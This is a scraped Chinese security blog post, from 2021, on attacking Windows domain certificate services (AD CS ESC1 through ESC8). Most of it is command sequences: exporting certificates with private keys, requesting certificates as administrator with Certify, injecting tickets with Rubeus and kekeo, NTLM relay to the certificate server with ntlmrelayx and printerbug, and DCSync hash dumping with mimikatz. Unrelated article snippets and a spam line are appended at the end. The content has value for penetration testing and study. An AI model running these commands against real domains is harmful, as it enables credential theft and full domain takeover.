<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    windows域之證書攻擊手段

    VSole2021-12-09 15:11:06
    參考鏈接:https://xz.aliyun.com/t/10064
    工具鏈接
    https://github.com/GhostPack/Certify
    證書服務發布的部分證書可用于kerberos認證,并且可以再返回的PAC中獲取NTMLhash。
    能進行認證的證書
    1、客戶端認證
    2、PKINIT 客戶端身份驗證
    3、智能卡登錄
    4、任何目的
    5、子CA
    其中ECS1和ECS8是比較常用的。中間的就記錄一下。
    

    搜索證書

    certmgr.msc 圖形化界面
    certutil -user -store My //查看個人證書
    certutil -user -store My f95e6b5dbafac54963c450052848745a54ec7bd9 c:\Users\test1\Desktop]test1.cer //導出證書
    certutil -user -exportPFX f95e6b5dbafac54963c450052848745a54ec7bd9 c:\Users\test1\Desktop]test1.pfx //導出證書包含公私鑰
    

    利用導出的證書竊取憑借

    1.查看用戶的證書 certutil -user -store My2.導出用戶證書,包含公私鑰3.本地添加證書,配代理訪問(kekeo校驗的時候看到會對域控請求,所以需要配dns代理一起,這里為了方便就直接內網機做了)tgt::pac /subject:證書用戶 /castore:current_user /domain:域控
    

    總結一下,原因是證書中包含了用戶的ntml信息,所以我們可以導出這些ntml信息(中間涉及一些證書不可導出的參考參考鏈接mimikatz導出)
    

    ADCS ESC1

    允許低權限用戶使用任意SAN請求證書,從而允許低權限用戶通過kerberos或schannel作為域中任何主體進行身份驗證,白話文就是實現偽造身份
    允許這些設置的已發布證書模板,攻擊者可以作為環境中的任何人請求證書,使用該證書為用戶獲取TGT
    最終實現低權限用戶擁有域控權限
    

    Certify.exe request /ca:yukongfu.e0mlja.com\e0mlja-YUKONGFU-CA-1 /template:LDAPS /altname:administrator//導出證書
    openssl pkcs12 -in 1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    生成證書
    

    注入證書
    Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.203.2 /ptt
    

    ADCS ESC2

    和ECS1類似,主要是他的條件更為寬松導致的
    我們可以使用帶有任何目的的EKU功能證書,進行客戶端、服務端的身份驗證,也可以使用無EKUs的證書來進行任何目的,或簽署新的證書
    因此使用從屬CA(比跟CA低一級的CA)證書,攻擊者能夠指定新證書中的任意EKUs或字段
    

    利用和ECS1一樣,就不繼續寫命令了
    

    ADCS ESC3

    證書請求代理EKU允許委托人代表其他用戶申請證書,對于任何注冊此模板的用戶,生成的證書可用于代表任何用戶共同簽署部署請求。代表其他用戶來申請證書,和偽造類似
    

    根據參考文章來看,工具沒有跑出來,所以利用一下命令看
    yukongfu.e0mlja.com\e0mlja-YUKONGFU-CA-1
    查看 
    Application Policies                  : 證書申請代理
    pkiextendedkeyusage                   : 客戶端身份驗證, 證書申請代理是否具有
    

    這里命令大同小異,記錄一下就行,2019復現出錯了。
    Certify.exe request /ca:"dc.test.com\test-DC-CA" /template:ESC3
    Certify.exe request /ca:"dc.test.com\test-DC-CA" /template:ESC3_1 /onbehalfof:TEST\administrator /enrollcert:3.pfx
    openssl pkcs12 -in 1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    Rubeus.exe asktgt /user:TEST\administrator /certificate:4.pfx
    

    ADCS ESC4

    https://www.cnblogs.com/sakura521/p/15489865.html
    主要還是配置錯誤導致寫權限可以寫造成的。
    

    ADCS ESC8

    證書中繼 ADCS Relay
    攻擊流程
    1.通過ntlm_relay,我們獲得一個以機器A用戶認證的證書
    2.我們通過Rubeus asktgt功能用這個證書向AD發起kerberos認證
    3.我們獲取到TGT并請求目標機器的TGS,獲取權限
    參考:https://www.cnblogs.com/marksec/p/15600759.html
    環境配置也見參考鏈接
    

    攻擊利用

    (1)certutil -config - -ping 獲取證書服務器的ipcertutil  -ca(2)判斷是否支持NTML方式curl  http://192.168.203.3/certsrv/ -I(3)中繼利用python3 ntlmrelayx.py  -t http://192.168.237.22/certsrv/certfnsh.asp -smb2support --adcs 開啟中繼監聽python printerbug.py domain/user:password@192.168.237.22 192.168.237.131打印機一:keko導出(注意參考鏈接給的代碼是有問題的)kekeo:base64 /input:ontgt::ask /pfx:xxx /user:DC01$  /domain: /pttuser需要為我們獲取證書的那個機器用戶
    

    看一下我全部的截圖+命令
    privilege::debug
    kerberos::purge
    //清楚票據 方便對比
    base64 /input:on
    tgt::ask /pfx:xxx /user:DC01$  /domain: /ptt 能夠看到這里注入了一張kirtgt的票據,就可以
    做金銀票了。dumphash
    

    Rubeus.exe asktgt /user:DC$ /certificate:MIIRFQIBAzCCEN8G /ppt
    

    dumphash
    lsadump::dcsync /all /csv /domain:e0mlja.com
    lsadump::dcsync /user:krbtgt /csv
    

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    證書服務發布的部分證書可用于kerberos認證,并且可以再返回的PAC中獲取NTMLhash。
    滲透重要漏洞匯總
    2021 年上半年,全球網絡安全界遭受了勒索軟件攻擊、重大供應鏈攻擊以及有組織的黑客行動的輪番轟炸,攻擊目標遍及醫療、金融、制造業、電信及交通等重點行業。數據泄露的規模、漏洞存在的年限、影響設備的數量、破壞效果呈擴大趨勢。黑客攻擊手段也更加復雜化,單筆勒索贖金更是達到創記錄的 7000 萬美元。
    各經濟體更加重視數據競爭力,紛紛制定出臺數據戰略,宣誓數據安全和主權。因此,歐盟認為必須建立歐洲數據主權。近年來,我國陸續發布了一系列數據及其安全相關的法律法規和標準規范,數據資產價值得到確認。2020年6月,12部委聯合發布《網絡安全審查辦法》,推動建立國家網絡安全審查工作機制。
    國家工業信息安全發展研究中心作為國家級信息安全研究和推進機構,聯合華為技術有限公司共同研究編制了《數據安全白皮書》,全面分析了我國數據安全產業基礎、防護關鍵技術、法律法規體系現狀,從提升數據安全產業基礎能力、加快研究和應用數據安全防護技術、強化法律法規在數據安全主權的支撐保障作用等三方面展望數據安全發展未來,提出了數據安全發展倡議,為行業發展提供借鑒和參考,積極推動我國數據治理工作有序開展。
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    日,烏克蘭報道其最大固網電信運營商遭遇重大網絡攻擊下線。而俄羅斯電信監管機構也發文,稱其正遭到定期的網絡攻擊。針對俄羅斯在烏克蘭的軍事行動,全球最大的黑客組織“匿名者”日前在社交網站上號召全球黑客對俄發起“網絡戰爭”。
    勒索軟件入侵能力的革命性升級,始于與國家網絡武器相結合,這構成了網絡空間新的重大威脅來源。國家沖突向網絡空間的映射,加速了網絡空間的軍備競賽,而網絡武器能復制、易拷貝的特殊屬性,導致網絡軍備擴散難以控制。
    數字安全時代,數據安全成為繼信息安全、網絡安全之后新的安全產業軸心。
    5月7日,美國最大燃油運輸管道商Colonial Pipeline公司因受勒索軟件攻擊,被迫臨時關閉其美國東部沿海各州供油的關鍵燃油網絡。為遏制威脅,公司已主動切斷部分網絡連接,暫停所有管道運營。為解除對燃料運輸的各種限制,保障石油產品的公路運輸,美國政府首次因網絡攻擊宣布18個州進入緊急狀態。此次網絡攻擊是美國歷史上針對公共事業的最大攻擊之一,暴露美國能源安全行業的網絡安全脆弱性,凸顯了保護關鍵
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类